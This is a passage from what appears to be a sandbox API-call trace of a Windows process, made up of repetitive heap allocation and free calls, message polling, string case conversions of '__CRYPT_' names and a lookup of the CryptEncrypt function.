lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0189.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0189.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0189.076] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.077] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0189.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0189.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0189.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.078] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11777) returned 0x3bf17c8 [0189.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf17c8 | out: hHeap=0x970000) returned 1 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b00 [0189.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.090] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0189.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54328 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.090] HeapFree 